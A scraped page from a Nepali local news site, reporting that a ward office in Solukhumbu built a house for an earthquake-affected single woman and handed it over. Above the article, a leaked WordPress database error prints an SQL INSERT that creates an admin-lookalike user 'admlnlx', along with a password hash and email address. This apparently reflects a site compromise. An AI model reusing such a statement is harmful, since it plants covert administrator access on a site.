WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlSTLmWar9/LU1XpECQH5Cyv0wWdpw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 20:06:11', '', 'admlnlx', 'admlnlx')

वडा कार्यालयद्वारा निर्माण गरिएको भवन असाहाय महिला रत्न कुमारी राईलाई हस्तान्तरण – Gaule Khabar

वडा कार्यालयद्वारा निर्माण गरिएको भवन असाहाय महिला रत्न कुमारी राईलाई हस्तान्तरण

वडा कार्यालयद्वारा निर्माण गरिएको भवन असाहाय महिला रत्न कुमारी राईलाई हस्तान्तरण

गाउँले न्यूज, सोलुखुम्बु । थुलुङदुधकोशी गाउँपालिका ९ नम्बर वडाले भुकम्प पिडित एकल महिलालाई घर निर्माण गरि हस्तान्तरण गरेको छ । एक कार्यक्रम बीच गाउँपालिका अध्यक्ष असिम राईले स्थानिय रत्न कुमारी राईलाई घर हस्तान्तरण गर्नु भएको हो ।
एकल महिला तथा सन्तानहरु पनि सुस्त मनस्थीतिका रहेकाले वडा कार्यालयले २ लाख तथा भुकम्प लाभग्राहिको ३ लाखबाट भवन निर्माण गरि हस्तान्तरण गरिएको वडाध्यक्ष भुपाल सिङ राइले बताए । उक्त घर निर्माणको लागि आफूले गर्न नसक्ने भएकोले वडाले नै सबै काम गरेको पनि वडा अध्यक्ष राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका